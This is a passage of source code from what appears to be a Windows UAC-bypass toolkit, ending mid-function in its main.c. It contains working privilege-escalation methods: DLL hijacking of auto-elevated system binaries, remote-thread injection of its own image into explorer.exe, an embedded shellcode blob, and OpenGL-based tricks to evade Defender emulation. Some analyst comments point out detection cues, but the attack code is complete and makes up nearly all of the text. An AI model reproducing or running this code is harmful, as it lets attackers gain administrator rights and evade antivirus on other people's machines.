        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        if (ExpandEnvironmentStringsW(WBEMDIR,
            szBuffer, MAX_PATH) == 0)
        {
            break;
        }
        //note: uacmAutoElevateCopyFile uses injection to explorer.exe
        bResult = ucmAutoElevateCopyFile(szSource, szBuffer);
        if (!bResult) {
            break;
        }

        //copy 1st stage target process
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\credwiz.exe",
            szSource, MAX_PATH) == 0)
        {
            break;
        }

        RtlSecureZeroMemory(szDest, sizeof(szDest));
        if (ExpandEnvironmentStrings(L"%temp%\\oobe.exe",
            szDest, MAX_PATH) == 0)
        {
            break;
        }
        if (!CopyFile(szSource, szDest, FALSE)) {
            break;
        }
        bResult = ucmAutoElevateCopyFile(szDest, szBuffer);
        if (!bResult) {
            break;
        }

        //setup basic shellcode routines
        // Resolved here in our process; the remote copy uses these absolute addresses as-is.
        RtlSecureZeroMemory(&g_ElevParamsSirefef, sizeof(g_ElevParamsSirefef));
        elvpar->xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(g_ctx.hShell32, "ShellExecuteExW");
        elvpar->xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(g_ctx.hKernel32, "WaitForSingleObject");
        elvpar->xCloseHandle = (pfnCloseHandle)GetProcAddress(g_ctx.hKernel32, "CloseHandle");

        //set shellcode 2nd stage target process
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(elvpar->szTargetApp, g_ctx.szSystemDirectory); //c:\windows\system32\wbem\oobe.exe
        _strcat_w(elvpar->szTargetApp, L"\\wbem\\oobe.exe");
        _strcpy_w(elvpar->szVerb, L"runas");
        _strcpy_w(szBuffer, g_ctx.szSystemDirectory); //c:\windows\system32\credwiz.exe
        _strcat_w(szBuffer, L"\\credwiz.exe");

        //run 1st stage target process
        hProcess = supRunProcessEx(szBuffer, NULL, NULL);
        if (hProcess == NULL) {
            break;
        }

        // Whole image (SizeOfImage bytes) is copied into an RWX region of the child.
        remotebuffer = VirtualAllocEx(hProcess, NULL, (SIZE_T)opth->SizeOfImage,
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        if (remotebuffer == NULL) {
            break;
        }
        if (!WriteProcessMemory(hProcess, remotebuffer, selfmodule, opth->SizeOfImage, &NumberOfBytesWritten)) {
            break;
        }

        // Rebase the routine and its parameter block by their offsets within our image.
        newEp = (char *)remotebuffer + ((char *)elevproc - (char *)selfmodule);
        newDp = (char *)remotebuffer + ((char *)elvpar - (char *)selfmodule);

        hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, newEp, newDp, 0, &c);
        bResult = (hRemoteThread != NULL);
        if (bResult) {
            WaitForSingleObject(hRemoteThread, INFINITE);
            CloseHandle(hRemoteThread);
        }

    } while (cond);

    // The first-stage host is always killed once we are done with it.
    if (hProcess != NULL) {
        TerminateProcess(hProcess, 0);
        CloseHandle(hProcess);
    }
    return bResult;
}
523 |
/*
* ucmGenericAutoelevation
*
* Purpose:
*
* Bypass UAC by abusing target autoelevated system32 application via missing system32 dll
*
* Parameters:
*
* lpTargetApp            - application path, may contain environment variables.
* lpTargetDll            - file name (at most 100 characters) the proxy dll is written under.
* ProxyDll, ProxyDllSize - proxy dll image.
*
* Return:
*
* Result of launching the expanded lpTargetApp, FALSE on any earlier failure.
*
* Note:
*
* Same structure as ucmMMCMethod with the launched application parameterized.
* The %temp% copy (szSource) and the dll placed under SYSTEMROOTDIR are not
* removed here.
*
*/
BOOL ucmGenericAutoelevation(
    LPWSTR lpTargetApp,
    LPWSTR lpTargetDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL bResult = FALSE, cond = FALSE;
    WCHAR szSource[MAX_PATH + 1];
    WCHAR szDest[MAX_PATH + 1];
    WCHAR szBuffer[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0) ||
        (lpTargetApp == NULL) ||
        (lpTargetDll == NULL)
        )
    {
        return bResult;
    }

    // Bounds the TEMPDIR + lpTargetDll concatenation below within szBuffer.
    if (_strlen_w(lpTargetDll) > 100) {
        return bResult;
    }

    do {

        //put target dll
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, TEMPDIR);
        _strcat_w(szBuffer, lpTargetDll);

        //expand string for proxy dll
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
            break;
        }

        //write proxy dll to disk
        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
            break;
        }

        //expand string for target dir
        RtlSecureZeroMemory(szDest, sizeof(szDest));
        if (ExpandEnvironmentStringsW(SYSTEMROOTDIR,
            szDest, MAX_PATH) == 0)
        {
            break;
        }

        //drop fubuki to system32
        bResult = ucmAutoElevateCopyFile(szSource, szDest);
        if (!bResult) {
            break;
        }

        // lpTargetApp is passed through environment expansion, not used verbatim.
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        if (ExpandEnvironmentStringsW(lpTargetApp,
            szBuffer, MAX_PATH) == 0)
        {
            break;
        }

        //run target app
        bResult = supRunProcess(szBuffer, NULL);

    } while (cond);

    return bResult;
}
604 |
/*
* ucmGWX
*
* Purpose:
*
* Bypass UAC by abusing newly added appinfo.dll backdoor.
* IIS initially not installed in Windows client, but appinfo.dll whitelists IIS application as autoelevated.
* We will use backdoor from "Get Windows 10" bullshit marketing promo package and exploit it with dll hijacking as usual.
*
* Parameters:
*
* None. Uses g_ctx.PayloadDll/PayloadDllSize and the embedded KONGOUDLL blob.
*
* Return:
*
* Result of launching <T_IIS_TARGETDIR>\<T_IIS_TARGETAPP>, FALSE if that file
* already exists or on any earlier failure.
*
* Note:
*
* Temp files are deleted only after their successful copy; a break in between
* leaves them in %temp%. The two files copied into T_IIS_TARGETDIR are never
* removed. Data is released with VirtualFree, which presumes DecompressPayload
* allocates with VirtualAlloc - NOTE(review): confirm in compress.c.
*
*/
BOOL ucmGWX(
    VOID
    )
{
    BOOL bResult = FALSE, cond = FALSE;
    WCHAR szDest[MAX_PATH + 1];
    // Receives szDest + "\" + T_IIS_TARGETAPP; only safe while T_IIS_TARGETAPP
    // stays under 19 characters - NOTE(review): verify against consts.h.
    WCHAR szTargetApp[MAX_PATH + 20];
    WCHAR szBuffer[MAX_PATH * 2];
    WCHAR szTempPath[MAX_PATH + 1];

    PVOID Data = NULL;
    ULONG DecompressedBufferSize = 0;

    do {

        //expand string for target dir
        RtlSecureZeroMemory(szDest, sizeof(szDest));
        if (ExpandEnvironmentStringsW(T_IIS_TARGETDIR,
            szDest, MAX_PATH) == 0)
        {
            break;
        }

        _strcpy_w(szTargetApp, szDest);
        _strcat_w(szTargetApp, TEXT("\\"));
        _strcat_w(szTargetApp, T_IIS_TARGETAPP);
        // PathFileExistsW comes from shlwapi (see the pragma comment(lib) at the top).
        if (PathFileExistsW(szTargetApp)) {
            //File already exist, could be IIS installed
            OutputDebugString(TEXT("[UCM] IIS installed, abort"));
            break;
        }

        //summon some unicorns
        Data = DecompressPayload((CONST PVOID)KONGOUDLL, sizeof(KONGOUDLL), &DecompressedBufferSize);
        if (Data == NULL)
            break;

        //temp
        RtlSecureZeroMemory(szTempPath, sizeof(szTempPath));
        if (ExpandEnvironmentStrings(TEMPDIR, szTempPath, MAX_PATH) == 0) {
            break;
        }

        //put target dll
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, szTempPath);
        _strcat_w(szBuffer, T_IIS_TARGETDLL);

        //write proxy dll to disk
        if (!supWriteBufferToFile(szBuffer, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
            break;
        }

        //drop fubuki to system32\inetsrv
        bResult = ucmAutoElevateCopyFile(szBuffer, szDest);
        if (!bResult) {
            break;
        }
        DeleteFile(szBuffer);

        //put target app
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, szTempPath);
        _strcat_w(szBuffer, T_IIS_TARGETAPP);

        //write app to disk
        if (!supWriteBufferToFile(szBuffer, Data, DecompressedBufferSize)) {
            break;
        }

        //drop InetMgr.exe to system32\inetsrv
        bResult = ucmAutoElevateCopyFile(szBuffer, szDest);
        if (!bResult) {
            break;
        }
        DeleteFile(szBuffer);

        bResult = supRunProcess(szTargetApp, NULL);
        if (bResult) {
            OutputDebugString(TEXT("Whoever created this gwx shit must be fired"));
        }

    } while (cond);

    if (Data != NULL) {
        VirtualFree(Data, 0, MEM_RELEASE);
    }
    return bResult;
}
704 |
--------------------------------------------------------------------------------
/BypassUAC/hybrids.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: HYBRIDS.H
6 | *
7 | * VERSION: 2.01
8 | *
9 | * DATE: 04 Jan 2016
10 | *
11 | * Prototypes and definitions for hybrid methods.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | BOOL ucmAvrfMethod(
22 | CONST PVOID AvrfDll,
23 | DWORD AvrfDllSize
24 | );
25 |
26 | BOOL ucmWinSATMethod(
27 | LPWSTR lpTargetDll,
28 | PVOID ProxyDll,
29 | DWORD ProxyDllSize,
30 | BOOL UseWusa
31 | );
32 |
33 | BOOL ucmMMCMethod(
34 | LPWSTR lpTargetDll,
35 | PVOID ProxyDll,
36 | DWORD ProxyDllSize
37 | );
38 |
39 | BOOL ucmSirefefMethod(
40 | PVOID ProxyDll,
41 | DWORD ProxyDllSize
42 | );
43 |
44 | BOOL ucmGenericAutoelevation(
45 | LPWSTR lpTargetApp,
46 | LPWSTR lpTargetDll,
47 | PVOID ProxyDll,
48 | DWORD ProxyDllSize
49 | );
50 |
51 | BOOL ucmGWX(
52 | VOID
53 | );
54 |
--------------------------------------------------------------------------------
/BypassUAC/inazuma32.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015
4 | *
5 | * TITLE: INAZUMA32.H
6 | *
7 | * VERSION: 1.71
8 | *
9 | * DATE: 25 Apr 2015
10 | *
11 | * ShellCode for EPO (Inazuma32).
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 |
//
// Opaque 32-bit machine-code blob (237 bytes). The file header only says
// "ShellCode for EPO (Inazuma32)"; nothing in this header explains how or where
// it is used, and its contents are not decoded here. For defenders this array
// is most useful as signature material: the byte sequence is fixed and is
// embedded verbatim in the binary.
//
static const unsigned char patchcode32[237] = {
    0xEB, 0x78, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x53, 0x56, 0x8B, 0xF1, 0x89, 0x55, 0xFC, 0x57,
    0x8B, 0x46, 0x3C, 0x8B, 0x44, 0x30, 0x78, 0x03, 0xC6, 0x8B, 0x48, 0x24, 0x8B, 0x50, 0x20, 0x03,
    0xCE, 0x8B, 0x58, 0x1C, 0x03, 0xD6, 0x8B, 0x40, 0x18, 0x03, 0xDE, 0x89, 0x4D, 0xF0, 0x33, 0xC9,
    0x89, 0x55, 0xF4, 0x89, 0x45, 0xF8, 0x85, 0xC0, 0x74, 0x29, 0x8B, 0x14, 0x8A, 0x03, 0xD6, 0x33,
    0xFF, 0xEB, 0x0C, 0x0F, 0xBE, 0xC0, 0x33, 0xC7, 0xC1, 0xC0, 0x03, 0x40, 0x42, 0x8B, 0xF8, 0x8A,
    0x02, 0x84, 0xC0, 0x75, 0xEE, 0x3B, 0x7D, 0xFC, 0x74, 0x12, 0x8B, 0x55, 0xF4, 0x41, 0x3B, 0x4D,
    0xF8, 0x72, 0xD7, 0x33, 0xC0, 0x5F, 0x5E, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45, 0xF0, 0x0F,
    0xB7, 0x04, 0x48, 0x8B, 0x04, 0x83, 0x03, 0xC6, 0xEB, 0xEB, 0x55, 0x8B, 0xEC, 0x81, 0xEC, 0x10,
    0x01, 0x00, 0x00, 0x64, 0xA1, 0x18, 0x00, 0x00, 0x00, 0x56, 0x57, 0x6A, 0x02, 0x8B, 0x40, 0x30,
    0x8B, 0x40, 0x0C, 0x8B, 0x78, 0x0C, 0x83, 0x65, 0xFC, 0x00, 0xC7, 0x45, 0xF4, 0x25, 0x54, 0x4D,
    0x50, 0xC7, 0x45, 0xF8, 0x25, 0x5C, 0x72, 0x33, 0x58, 0x8B, 0x3F, 0x48, 0x75, 0xFB, 0x8B, 0x4F,
    0x18, 0xBA, 0x08, 0x7E, 0xB3, 0x69, 0xE8, 0x47, 0xFF, 0xFF, 0xFF, 0x8B, 0x4F, 0x18, 0x8B, 0xF0,
    0x68, 0x04, 0x01, 0x00, 0x00, 0x8D, 0x85, 0xF0, 0xFE, 0xFF, 0xFF, 0xBA, 0xA2, 0x90, 0x38, 0xF5,
    0x50, 0x8D, 0x45, 0xF4, 0x50, 0xE8, 0x28, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0x8D, 0x85, 0xF0, 0xFE,
    0xFF, 0xFF, 0x50, 0xFF, 0xD6, 0x5F, 0x33, 0xC0, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3
};
37 |
--------------------------------------------------------------------------------
/BypassUAC/inject.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016
4 | *
5 | * TITLE: INJECT.C
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 12 Nov 2015
10 | *
11 | * Inject module.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #include "global.h"
20 |
/*
* ucmInjectExplorer
*
* Purpose:
*
* Copy this module's own image into an explorer.exe process and start a
* remote thread there at ElevatedLoadProc, with ElevParams as the thread
* argument.
*
* Parameters:
*
*   ElevParams       - address, inside this image, of the parameter block the
*                      remote thread receives. NULL is rejected.
*   ElevatedLoadProc - address, inside this image, of the routine the remote
*                      thread starts at. NULL is rejected.
*
* Return:
*
*   TRUE when CreateRemoteThread succeeded (the thread is then waited on
*   with an INFINITE timeout), FALSE otherwise.
*
* Analyst notes:
*
*   - Target selection: an existing explorer.exe via supGetExplorerHandle();
*     if none is found a fresh explorer.exe is started (bZombie) and
*     terminated again on the way out.
*   - The whole image (opth->SizeOfImage bytes from the module base) is
*     written into one PAGE_EXECUTE_READWRITE allocation. The remote entry
*     point and parameter addresses are derived by plain offset arithmetic,
*     so nothing is relocated; the routine at ElevatedLoadProc therefore has
*     to be position-independent (the ELOAD_PARAMETERS* blocks in inject.h
*     carry API pointers and ids, which looks like the mechanism for that).
*   - OpenProcess → VirtualAllocEx(RWX) → WriteProcessMemory →
*     CreateRemoteThread is the classic remote-thread injection sequence;
*     process-access and remote-thread telemetry against explorer.exe is what
*     a detection would key on.
*   - The remote allocation is never released (no VirtualFreeEx); when the
*     target was not spawned here it stays mapped in explorer.exe.
*
*/
BOOL ucmInjectExplorer(
    _In_ LPVOID ElevParams,
    _In_ LPVOID ElevatedLoadProc
)
{
    BOOL cond = FALSE, bResult = FALSE, bZombie = FALSE;
    DWORD c;
    HANDLE hProcess = NULL, hRemoteThread = NULL;
    HINSTANCE selfmodule = GetModuleHandle(NULL);
    // Walk our own PE headers to get SizeOfImage (number of bytes to copy).
    PIMAGE_DOS_HEADER pdosh = (PIMAGE_DOS_HEADER)selfmodule;
    PIMAGE_FILE_HEADER fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD));
    PIMAGE_OPTIONAL_HEADER opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER));
    LPVOID remotebuffer = NULL, newEp, newDp;
    SIZE_T NumberOfBytesWritten = 0;

    if (
        (ElevParams == NULL) ||
        (ElevatedLoadProc == NULL)
        )
    {
        return bResult;
    }

    // do { ... } while (FALSE): "break" is used as goto-cleanup.
    do {
        //
        // Open explorer handle with maximum allowed rights.
        //
        hProcess = supGetExplorerHandle();
        if (hProcess == NULL) {
            // No explorer found: start one ourselves and remember to kill it.
            hProcess = supRunProcessEx(L"explorer.exe", NULL, NULL);
            if (hProcess != NULL) {
                bZombie = TRUE;
            }
        }
        if (hProcess == NULL) {
            OutputDebugString(TEXT("[UCM] Cannot open target process."));
            break;
        }

        //
        // Allocate buffer in target process and write itself inside.
        //
        remotebuffer = VirtualAllocEx(hProcess, NULL, (SIZE_T)opth->SizeOfImage,
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        if (remotebuffer == NULL) {
            OutputDebugString(TEXT("[UCM] Cannot allocate memory in target process."));
            break;
        }
        // NumberOfBytesWritten is not compared against SizeOfImage afterwards.
        if (!WriteProcessMemory(hProcess, remotebuffer, selfmodule, opth->SizeOfImage, &NumberOfBytesWritten)) {
            OutputDebugString(TEXT("[UCM] Cannot write to the target process memory."));
            break;
        }

        //
        // Calculate new entry point offset and run remote thread with it.
        // Same offset from the base as in this process; no relocation is applied.
        //
        newEp = (char *)remotebuffer + ((char *)ElevatedLoadProc - (char *)selfmodule);
        newDp = (char *)remotebuffer + ((char *)ElevParams - (char *)selfmodule);

        // c receives the thread id; it is not used afterwards.
        hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, newEp, newDp, 0, &c);
        bResult = (hRemoteThread != NULL);
        if (bResult) {
            WaitForSingleObject(hRemoteThread, INFINITE);
            CloseHandle(hRemoteThread);
        }

    } while (cond);

    //
    // Close target process handle (and kill explorer if we spawned it).
    //
    if (hProcess != NULL) {
        if (bZombie) {
            TerminateProcess(hProcess, 0);
        }
        CloseHandle(hProcess);
    }
    return bResult;
}
109 |
--------------------------------------------------------------------------------
/BypassUAC/inject.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016
4 | *
5 | * TITLE: INJECT.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Injector prototypes and definitions.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | #include
22 |
23 | typedef HRESULT(WINAPI *pfnCoInitialize)(LPVOID pvReserved);
24 | typedef HRESULT(WINAPI *pfnCoCreateInstance)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID FAR * ppv);
25 | typedef HRESULT(WINAPI *pfnCoGetObject)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv);
26 | typedef HRESULT(WINAPI *pfnSHCreateItemFromParsingName)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv);
27 | typedef BOOL(WINAPI *pfnShellExecuteExW)(SHELLEXECUTEINFOW *pExecInfo);
28 | typedef DWORD(WINAPI *pfnWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);
29 | typedef BOOL(WINAPI *pfnCloseHandle)(HANDLE hObject);
30 | typedef void(WINAPI *pfnCoUninitialize)(void);
31 | typedef void(WINAPI *pfnOutputDebugStringW)(LPCWSTR lpOutputString);
32 | typedef void (WINAPI *pfnSleep)(DWORD dwMilliseconds);
33 |
//
// Parameter block for code that runs inside another process (presumably the
// routine ucmInjectExplorer starts, which receives a block like this as its
// thread argument — TODO confirm against the caller that fills it in).
// Because the injected image is copied without relocation, the routine cannot
// use its own imports: every API it needs is handed over as a pointer, together
// with the COM ids and the path strings it operates on.
//
typedef struct _ELOAD_PARAMETERS {
    // COM identifiers, filled in by the caller.
    IID xIID_IShellItem;
    IID xIID;
    CLSID xCLSID;
    // API entry points, resolved by the caller in this process.
    pfnCoInitialize xCoInitialize;
    pfnCoCreateInstance xCoCreateInstance;
    pfnCoGetObject xCoGetObject;
    pfnSHCreateItemFromParsingName xSHCreateItemFromParsingName;
    pfnShellExecuteExW xShellExecuteExW;
    pfnWaitForSingleObject xWaitForSingleObject;
    pfnCloseHandle xCloseHandle;
    pfnCoUninitialize xCoUninitialize;
    pfnOutputDebugStringW xOutputDebugStringW;

    // Moniker string; note MAX_PATH here versus MAX_PATH + 1 for the paths.
    WCHAR EleMoniker[MAX_PATH];
    WCHAR SourceFilePathAndName[MAX_PATH + 1];
    WCHAR DestinationDir[MAX_PATH + 1];
    WCHAR ExePathAndName[MAX_PATH + 1];
} ELOAD_PARAMETERS, *PELOAD_PARAMETERS;
55 |
//
// Variant of ELOAD_PARAMETERS for the ISecurityEditor path (see the vtable
// declared below): an object name/type, the SECURITY_INFORMATION selector and
// a replacement SDDL string, plus the ids and API pointers needed to obtain the
// editor object. Which code consumes it is not visible in this header — TODO
// confirm. From a defender's view the capability expressed here is rewriting an
// object's security descriptor from an SDDL string.
//
typedef struct _ELOAD_PARAMETERS_2 {
    SE_OBJECT_TYPE ObjectType;
    SECURITY_INFORMATION SecurityInformation;
    //
    WCHAR szTargetObject[MAX_PATH + 1];
    WCHAR szNewSDDL[MAX_PATH + 1];
    WCHAR EleMoniker[MAX_PATH];
    // COM identifiers for the security editor object.
    IID xIID_ISecurityEditor;
    CLSID xCLSID_ShellSecurityEditor;
    // API entry points, resolved by the caller in this process.
    pfnCoInitialize xCoInitialize;
    pfnCoCreateInstance xCoCreateInstance;
    pfnCoGetObject xCoGetObject;
    pfnCoUninitialize xCoUninitialize;
    pfnOutputDebugStringW xOutputDebugStringW;
} ELOAD_PARAMETERS_2, *PELOAD_PARAMETERS_2;
73 |
//
// Layout-compatible prefix of ELOAD_PARAMETERS: the members up to and including
// EleMoniker appear in the same order, with Spare0..Spare2 occupying the slots
// that hold xShellExecuteExW / xWaitForSingleObject / xCloseHandle in
// ELOAD_PARAMETERS. Code that only touches the common prefix can therefore be
// handed either block. The trailing ExePathAndName of ELOAD_PARAMETERS is
// absent here.
//
typedef struct _ELOAD_PARAMETERS_3 {
    //common with ELOAD_PARAMETERS
    //
    IID xIID_IShellItem;
    IID xIID;
    CLSID xCLSID;
    //
    pfnCoInitialize xCoInitialize;
    pfnCoCreateInstance xCoCreateInstance;
    pfnCoGetObject xCoGetObject;
    pfnSHCreateItemFromParsingName xSHCreateItemFromParsingName;
    PVOID Spare0;   // slot of xShellExecuteExW in ELOAD_PARAMETERS
    PVOID Spare1;   // slot of xWaitForSingleObject in ELOAD_PARAMETERS
    PVOID Spare2;   // slot of xCloseHandle in ELOAD_PARAMETERS
    pfnCoUninitialize xCoUninitialize;
    pfnOutputDebugStringW xOutputDebugStringW;

    WCHAR EleMoniker[MAX_PATH];
    //end of common with ELOAD_PARAMETERS

    WCHAR SourceFilePathAndName[MAX_PATH + 1];
    WCHAR DestinationDir[MAX_PATH + 1];
} ELOAD_PARAMETERS_3, *PELOAD_PARAMETERS_3;
97 |
//
// Minimal block for a ShellExecuteExW-based launch: a verb, a target
// application string (MAX_PATH * 4 characters, so presumably it can carry
// arguments as well — TODO confirm) and the three APIs needed to start the
// process and wait for it.
//
typedef struct _ELOAD_PARAMETERS_4 {
    WCHAR szVerb[MAX_PATH + 1];
    WCHAR szTargetApp[MAX_PATH * 4];
    pfnShellExecuteExW xShellExecuteExW;
    pfnWaitForSingleObject xWaitForSingleObject;
    pfnCloseHandle xCloseHandle;
} ELOAD_PARAMETERS_4, *PELOAD_PARAMETERS_4;
105 |
106 | typedef interface ISecurityEditor ISecurityEditor;
107 |
//
// Hand-written C vtable for the ISecurityEditor COM interface (declared here
// rather than pulled from an SDK header). Slots 0-2 are the IUnknown methods;
// GetSecurity / SetSecurity read or replace the security descriptor of the
// named object, selected by SE_OBJECT_TYPE and SECURITY_INFORMATION, as an
// SDDL string. Who frees the string returned through ppSDDLStr is not stated
// here — TODO confirm before relying on it.
//
typedef struct ISecurityEditorVtbl {

    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in ISecurityEditor * This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void **ppvObject);

    ULONG(STDMETHODCALLTYPE *AddRef)(
        __RPC__in ISecurityEditor * This);

    ULONG(STDMETHODCALLTYPE *Release)(
        __RPC__in ISecurityEditor * This);

    // Returns the object's security descriptor as SDDL text.
    HRESULT(STDMETHODCALLTYPE *GetSecurity)(
        __RPC__in ISecurityEditor * This,
        _In_ LPCOLESTR ObjectName,
        _In_ SE_OBJECT_TYPE ObjectType,
        _In_ SECURITY_INFORMATION SecurityInfo,
        _Out_opt_ LPCOLESTR * ppSDDLStr);

    // Applies the SDDL text in ppSDDLStr (passed by value despite the name)
    // to the object's security descriptor.
    HRESULT(STDMETHODCALLTYPE *SetSecurity)(
        __RPC__in ISecurityEditor * This,
        _In_ LPCOLESTR ObjectName,
        _In_ SE_OBJECT_TYPE ObjectType,
        _In_ SECURITY_INFORMATION SecurityInfo,
        _In_ LPCOLESTR ppSDDLStr);

    END_INTERFACE

} *PISecurityEditorVtbl;
140 |
141 | interface ISecurityEditor
142 | {
143 | CONST_VTBL struct ISecurityEditorVtbl *lpVtbl;
144 | };
145 |
146 | BOOL ucmInjectExplorer(
147 | _In_ LPVOID ElevParams,
148 | _In_ LPVOID ElevatedLoadProc
149 | );
150 |
--------------------------------------------------------------------------------
/BypassUAC/main.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * TITLE: MAIN.C
4 | *
5 | * VERSION: 2.01
6 | *
7 | * DATE: 04 Jan 2016
8 | *
9 | * Program entry point.
10 | *
11 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
12 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
13 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
14 | * PARTICULAR PURPOSE.
15 | *
16 | *******************************************************************************/
17 | #define OEMRESOURCE
18 | #include "global.h"
19 | #include
20 | #include
21 | #pragma comment(lib, "opengl32.lib")
22 |
23 | UACMECONTEXT g_ctx;
24 |
25 | static pfnDecompressPayload pDecryptPayload = NULL;
26 |
27 | #if (_MSC_VER >= 1900)
28 | #ifdef _DEBUG
29 | #pragma comment(lib, "vcruntimed.lib")
30 | #pragma comment(lib, "ucrtd.lib")
31 | #else
32 | #pragma comment(lib, "libvcruntime.lib")
33 | #endif
34 | #endif
35 |
/*
* DummyWindowProc
*
* Purpose:
*
* Window procedure for the throwaway window ucmInit creates for its OpenGL
* anti-emulation step. The only message it acts on is WM_CLOSE, which posts
* WM_QUIT so ucmInit's message loop ends; everything else is left to
* DefWindowProc.
*
*/
LRESULT CALLBACK DummyWindowProc(
    HWND hwnd,
    UINT uMsg,
    WPARAM wParam,
    LPARAM lParam
)
{
    if (uMsg == WM_CLOSE) {
        PostQuitMessage(0);
    }
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
58 |
/*
* ucmInit
*
* Purpose:
*
* Prestart phase with MSE / Windows Defender anti-emulation part.
*
* Reads the method number from the first command-line parameter, fills the
* global g_ctx (module handles, system directory, OS version, WOW64 flag),
* obtains the payload-decompression function pointer through the OpenGL
* round-trip described below and decompresses the payload DLL into
* g_ctx.PayloadDll / g_ctx.PayloadDllSize.
*
* Return:
*
*   ERROR_SUCCESS, or one of: ERROR_BAD_ARGUMENTS (no/invalid method number),
*   ERROR_UNSUPPORTED_TYPE (release builds only: the token is not a limited
*   admin token), ERROR_INVALID_HANDLE (kernel32/ole32/shell32 not obtainable),
*   ERROR_INVALID_DATA (system directory query or payload decompression
*   failed), ERROR_INVALID_ACCESS (RtlGetVersion failed),
*   ERROR_INSTALL_PLATFORM_UNSUPPORTED (build number below 7000).
*
* Analyst notes:
*
*   - The address of DecompressPayload is never assigned to pDecryptPayload
*     directly. It is drawn into the GL back buffer with glDrawPixels and read
*     back with glReadPixels (two RGBA pixels = 8 bytes on x64, one pixel = 4
*     bytes on x86). An environment whose OpenGL path does not round-trip pixel
*     data bit-exactly leaves pDecryptPayload NULL or garbage, and the call in
*     the switch below has no NULL check, so the process faults there —
*     presumably the intended anti-emulation outcome. A sandbox that wants to
*     reach the payload needs a faithful GL implementation.
*   - RegisterClassEx, CreateWindowEx, GetDC, ChoosePixelFormat,
*     SetPixelFormat and wglCreateContext results are not checked. On an
*     early `break` after the window exists the class is never unregistered,
*     and wglDeleteContext is not called on any path.
*
*/
UINT ucmInit(
    VOID
)
{
    BOOL cond = FALSE;
    DWORD Result = ERROR_SUCCESS;
    PVOID Ptr;
